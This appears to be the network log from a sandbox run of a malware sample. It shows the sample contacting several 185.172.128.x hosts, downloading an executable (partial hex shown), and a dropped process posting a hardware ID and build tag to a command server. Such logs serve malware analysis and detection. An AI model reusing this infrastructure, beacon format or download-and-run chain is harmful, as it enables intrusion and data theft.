Apr 27, 2024 00:46:06.983483076 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.983510971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.983730078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.983747959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.983768940 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.983778954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.983783007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.983819008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.983829021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.983866930 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.983876944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.983894110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.983910084 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.983923912 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.984000921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.984038115 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.984049082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.984066010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.984082937 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.984097004 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.984131098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.984148026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.984169006 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.984178066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.984201908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.984220028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.984236002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.984237909 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.984245062 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.984266043 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.984524965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.984559059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.984577894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.984612942 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.984617949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.984652042 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.984663010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.984699965 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.984787941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.984807014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.984827042 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.984836102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.984859943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.984893084 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.984911919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.984950066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.984966040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.985002995 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.985035896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.985078096 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.985079050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.985110998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.985115051 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.985126972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.985143900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.985146046 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.985158920 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.985179901 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.985191107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.985225916 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.985459089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.985496044 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.985512972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.985532045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.985546112 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.985548019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.985569000 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.985588074 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.985632896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.985666990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.985670090 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.985702038 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.985740900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.985774040 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.985780001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.985812902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.985934019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.985971928 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.985972881 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.985991001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.986008883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.986010075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.986021996 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.986042023 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.986053944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.986084938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.986087084 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.986100912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.986119986 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.986131907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.986145020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.986161947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.986176014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.986192942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.986197948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.986223936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.986231089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.986239910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.986260891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.986272097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.986279011 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.986310959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.986360073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.986376047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.986390114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.986407042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.986408949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.986442089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.986473083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.986490011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.986502886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.986515045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.986531019 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.986531973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.986557007 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.986572981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.986577034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.986594915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.986608982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.986625910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.986627102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.986643076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.986656904 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.986675978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.986676931 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.986706972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.987221956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.987238884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.987253904 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.987255096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.987271070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.987271070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.987289906 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.987298012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.987303972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.987339020 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.987361908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.987377882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.987391949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.987392902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.987411022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.987412930 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.987431049 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.987442970 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.987454891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.987487078 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.987525940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.987559080 CEST	49734	80	192.168.2.4	176.97.76.106

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 27, 2024 00:46:04.537455082 CEST	192.168.2.4	1.1.1.1	0x6508	Standard query (0)	note.padd.cn.com	A (IP address)	IN (0x0001)	false
Apr 27, 2024 00:46:14.560359955 CEST	192.168.2.4	1.1.1.1	0x52d6	Standard query (0)	svc.iolo.com	A (IP address)	IN (0x0001)	false
Apr 27, 2024 00:46:24.090508938 CEST	192.168.2.4	1.1.1.1	0x727e	Standard query (0)	download.iolo.net	A (IP address)	IN (0x0001)	false
Apr 27, 2024 00:47:07.631598949 CEST	192.168.2.4	1.1.1.1	0x4c72	Standard query (0)	westus2-2.in.applicationinsights.azure.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 27, 2024 00:46:04.812298059 CEST	1.1.1.1	192.168.2.4	0x6508	No error (0)	note.padd.cn.com		176.97.76.106	A (IP address)	IN (0x0001)	false
Apr 27, 2024 00:46:14.668052912 CEST	1.1.1.1	192.168.2.4	0x52d6	No error (0)	svc.iolo.com		20.157.87.45	A (IP address)	IN (0x0001)	false
Apr 27, 2024 00:46:19.357995033 CEST	1.1.1.1	192.168.2.4	0xd771	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Apr 27, 2024 00:46:19.357995033 CEST	1.1.1.1	192.168.2.4	0xd771	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Apr 27, 2024 00:46:20.128381014 CEST	1.1.1.1	192.168.2.4	0x94db	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 27, 2024 00:46:20.128381014 CEST	1.1.1.1	192.168.2.4	0x94db	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 27, 2024 00:46:24.190517902 CEST	1.1.1.1	192.168.2.4	0x727e	No error (0)	download.iolo.net	iolo0.b-cdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 27, 2024 00:46:24.190517902 CEST	1.1.1.1	192.168.2.4	0x727e	No error (0)	iolo0.b-cdn.net		169.150.236.100	A (IP address)	IN (0x0001)	false
Apr 27, 2024 00:47:07.720077991 CEST	1.1.1.1	192.168.2.4	0x4c72	No error (0)	westus2-2.in.applicationinsights.azure.com	westus2-2.in.ai.monitor.azure.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 27, 2024 00:47:07.720077991 CEST	1.1.1.1	192.168.2.4	0x4c72	No error (0)	westus2-2.in.ai.monitor.azure.com	westus2-2.in.ai.privatelink.monitor.azure.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 27, 2024 00:47:07.720077991 CEST	1.1.1.1	192.168.2.4	0x4c72	No error (0)	westus2-2.in.ai.privatelink.monitor.azure.com	gig-ai-prod-westus2-0.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.172.128.90	80	6916	C:\Users\user\Desktop\kO1P1YnLst.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:45:59.672339916 CEST	206	OUT	GET /cpa/ping.php?substr=eight&s=ab&sub=0 HTTP/1.1 Host: 185.172.128.90 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 27, 2024 00:46:01.612524986 CEST	148	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 22:45:59 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Content-Type: text/html; charset=UTF-8 Data Raw: 31 Data Ascii: 1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	185.172.128.228	80	6916	C:\Users\user\Desktop\kO1P1YnLst.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:46:02.423996925 CEST	192	OUT	GET /ping.php?substr=eight HTTP/1.1 Host: 185.172.128.228 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 27, 2024 00:46:02.594557047 CEST	147	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 22:46:02 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	185.172.128.59	80	6916	C:\Users\user\Desktop\kO1P1YnLst.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:46:02.777806997 CEST	181	OUT	GET /syncUpd.exe HTTP/1.1 Host: 185.172.128.59 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 27, 2024 00:46:02.949529886 CEST	1289	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 22:46:02 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 26 Apr 2024 22:45:02 GMT ETag: "48000-61707a77a069a" Accept-Ranges: bytes Content-Length: 294912 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0f 14 d4 08 4b 75 ba 5b 4b 75 ba 5b 4b 75 ba 5b 46 27 65 5b 55 75 ba 5b 46 27 5a 5b c3 75 ba 5b 46 27 5b 5b 64 75 ba 5b 42 0d 29 5b 48 75 ba 5b 4b 75 bb 5b 3b 75 ba 5b fe eb 5f 5b 4a 75 ba 5b 46 27 61 5b 4a 75 ba 5b fe eb 64 5b 4a 75 ba 5b 52 69 63 68 4b 75 ba 5b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b8 d4 c7 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0c 00 00 1a 01 00 00 3c c2 03 00 00 00 00 e7 40 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 c3 03 00 04 00 00 ec 72 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Ku[Ku[Ku[F'e[Uu[F'Z[u[F'[[du[B)[Hu[Ku[;u[_[Ju[F'a[Ju[d[Ju[RichKu[PELd<@0@r(i`L28@0.text `.rdatam0n@@.dataMt@.rsrcij@@.relocL`j@B [TRUNCATED]
Apr 27, 2024 00:46:02.949569941 CEST	1289	IN	Data Raw: 41 00 e8 ef 27 00 00 59 c3 b9 dc dc 01 04 e8 c8 02 00 00 68 8f 28 41 00 e8 d9 27 00 00 59 c3 b9 c8 dc 01 04 e8 1f 03 00 00 68 85 28 41 00 e8 c3 27 00 00 59 c3 6a 00 b9 d0 dc 01 04 e8 15 01 00 00 c3 6a 00 b9 c4 dc 01 04 e8 08 01 00 00 c3 6a 00 b9 Data Ascii: A'Yh(A'Yh(A'YjjjjUQQL$$X]E]UQQQQ$ ]EYY]UVEPUQA^]QAUVEtV
Apr 27, 2024 00:46:02.949609041 CEST	1289	IN	Data Raw: 00 53 53 ff 15 34 30 41 00 8d 45 c8 50 ff 15 14 30 41 00 53 53 53 ff 15 30 30 41 00 8d 85 b0 fb ff ff 50 53 ff 15 a4 30 41 00 53 53 ff 15 a0 30 41 00 8d 45 c4 50 53 8d 45 b0 50 53 ff 15 48 30 41 00 53 53 53 53 ff 15 5c 30 41 00 8b 45 f8 8b 0d b8 Data Ascii: SS40AEP0ASSS00APS0ASS0AEPSEPSH0ASSSS\0AE+}uS0AEEE]EEEEEEMEEEEMU3E3U:UGaUNt]MuE~_^[]V5W=t
Apr 27, 2024 00:46:02.949647903 CEST	1289	IN	Data Raw: 55 b8 2b e8 9d 09 f7 65 f0 8b 45 f0 81 6d f4 75 6b 6d 57 b8 65 7f f8 62 f7 65 d0 8b 45 d0 81 6d f0 1a 01 37 1b 81 45 c8 65 b1 36 08 81 45 dc f6 3e 79 75 81 45 d8 02 56 5f 47 81 45 c0 d6 bd 17 3f 81 45 e4 12 5f 9d 36 b8 7b ea 48 5f f7 65 dc 8b 45 Data Ascii: U+eEmukmWebeEm7Ee6E>yuEV_GE?E_6{H_eEEMWcm%>mzmmRQ6keEE%v;QeEQKeE)#eEtUeEeED7eEmI'D eEyuSeEoeEm
Apr 27, 2024 00:46:02.949685097 CEST	1289	IN	Data Raw: 33 c0 3b c6 5f 1b c0 f7 d8 5e 5d c2 08 00 8b cf e8 31 00 00 00 cc 55 8b ec 83 7d 08 00 57 8b f9 74 1d e8 49 00 00 00 39 45 08 72 13 8b cf e8 3d 00 00 00 03 47 10 3b 45 08 76 04 b0 01 eb 02 32 c0 5f 5d c2 04 00 68 5c 89 41 00 e8 c0 03 00 00 cc 68 Data Ascii: 3;_^]1U}WtI9Er=G;Ev2_]h\AhlAU]faayrUQEPN3B;HF]`(AgSVuWe};su'3EOu;vW+
Apr 27, 2024 00:46:02.949724913 CEST	1289	IN	Data Raw: e7 03 73 11 f3 0f 7e 0e 83 e9 08 8d 76 08 66 0f d6 0f 8d 7f 08 f7 c6 07 00 00 00 74 63 0f ba e6 03 0f 83 b2 00 00 00 66 0f 6f 4e f4 8d 76 f4 66 0f 6f 5e 10 83 e9 30 66 0f 6f 46 20 66 0f 6f 6e 30 8d 76 30 83 f9 30 66 0f 6f d3 66 0f 3a 0f d9 0c 66 Data Ascii: s~vftcfoNvfo^0foF fon0v00fof:ffof:fGfof:fo 0}vfoNvIfo^0foF fon0v00fof:ffof:fGfof:fo 0}vVfoNvfo^0foF fo
Apr 27, 2024 00:46:02.949764013 CEST	1289	IN	Data Raw: 0f 7f 7f 70 8d b6 80 00 00 00 8d bf 80 00 00 00 4a 75 a3 85 c9 74 4f 8b d1 c1 ea 04 85 d2 74 17 8d 9b 00 00 00 00 66 0f 6f 06 66 0f 7f 07 8d 76 10 8d 7f 10 4a 75 ef 83 e1 0f 74 2a 8b c1 c1 e9 02 74 0d 8b 16 89 17 8d 76 04 8d 7f 04 49 75 f3 8b c8 Data Ascii: pJutOtfofvJut*tvIutFGIuX^_$++QtFGIutvHuYAA1 AAUEu#h#3]@]U
Apr 27, 2024 00:46:02.949803114 CEST	1289	IN	Data Raw: 00 54 2e 40 00 4c 2e 40 00 8b 44 8e e4 89 44 8f e4 8b 44 8e e8 89 44 8f e8 8b 44 8e ec 89 44 8f ec 8b 44 8e f0 89 44 8f f0 8b 44 8e f4 89 44 8f f4 8b 44 8e f8 89 44 8f f8 8b 44 8e fc 89 44 8f fc 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 98 2e 40 Data Ascii: T.@L.@DDDDDDDDDDDDDD$.@.@.@.@.@D$^_D$^_FGD$^_IFGFGD$^_t1\|9u$r$40@$/@Ir+$8/@$
Apr 27, 2024 00:46:02.949841022 CEST	1289	IN	Data Raw: 00 00 59 e8 a1 1a 00 00 c7 00 0c 00 00 00 33 c0 5e 5d c3 cc 8b 4c 24 04 f7 c1 03 00 00 00 74 24 8a 01 83 c1 01 84 c0 74 4e f7 c1 03 00 00 00 75 ef 05 00 00 00 00 8d a4 24 00 00 00 00 8d a4 24 00 00 00 00 8b 01 ba ff fe fe 7e 03 d0 83 f0 ff 33 c2 Data Ascii: Y3^]L$t$tNu$$~3tAt2t$ttAL$+AL$+AL$+AL$+W\|$n$L$Wtt=u~3tAt#
Apr 27, 2024 00:46:02.949878931 CEST	1289	IN	Data Raw: 00 e8 2b 15 00 00 33 c0 eb 7e 33 c0 8b 5d 0c 85 db 0f 95 c0 85 c0 74 de 33 c0 38 03 0f 95 c0 85 c0 74 d3 e8 ac 3a 00 00 8b f0 89 75 08 85 f6 75 0d e8 6a 15 00 00 c7 00 18 00 00 00 eb c8 83 65 fc 00 80 3f 00 75 20 e8 54 15 00 00 c7 00 16 00 00 00 Data Ascii: +3~3]t38t:uuje?u TjEPh8A>VuSW;}E)u}VJYUj@uu,]jhAN)3]3}uQ39Et
Apr 27, 2024 00:46:03.120253086 CEST	1289	IN	Data Raw: 75 fc 50 6a ff ff 75 08 6a 00 53 ff 15 54 30 41 00 85 c0 75 19 ff 15 58 30 41 00 50 e8 55 10 00 00 ff 36 e8 c3 10 00 00 83 26 00 59 eb bd 33 c0 40 5e 5b 8b e5 5d c3 55 8b ec 51 8d 45 fc 50 68 b0 40 41 00 6a 00 ff 15 b8 30 41 00 85 c0 74 17 68 c8 Data Ascii: uPjujST0AuX0APU6&Y3@^[]UQEPh@Aj0Ath@Auh0Atu]UuYu0AUuEYhjjjMjjj>U=@Ath@AqSYtu@AYNTh1Ah1A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	185.172.128.76	80	416	C:\Users\user\AppData\Local\Temp\u5c4.0.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:46:04.983918905 CEST	417	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDGIJJDGCBKFIDHIEBKE Host: 185.172.128.76 Content-Length: 216 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 45 41 35 39 44 31 37 39 41 41 31 31 30 36 36 35 34 35 34 36 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 2d 2d 0d 0a Data Ascii: ------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="hwid"3DEA59D179AA1106654546------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="build"default10------HDGIJJDGCBKFIDHIEBKE--
Apr 27, 2024 00:46:05.535518885 CEST	347	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:46:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Vary: Accept-Encoding Data Raw: 4d 44 41 31 59 7a 63 34 5a 47 59 79 4d 7a 51 35 4d 57 56 6c 4d 54 4e 6a 4e 44 67 31 4e 44 63 33 4d 7a 6b 34 4f 47 46 6d 4f 44 68 6a 4e 32 4e 6b 4d 7a 67 32 4f 47 59 35 4e 57 56 69 4e 44 4a 6c 59 6a 68 6b 59 6d 55 33 4f 47 4e 6b 59 57 46 6c 4d 57 56 6c 4d 44 46 6d 4f 44 6b 78 4f 44 56 68 66 47 68 6c 63 6a 64 6f 4e 44 68 79 66 47 56 79 4e 47 67 30 5a 54 68 79 4e 43 35 6d 61 57 78 6c 66 44 46 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d Data Ascii: 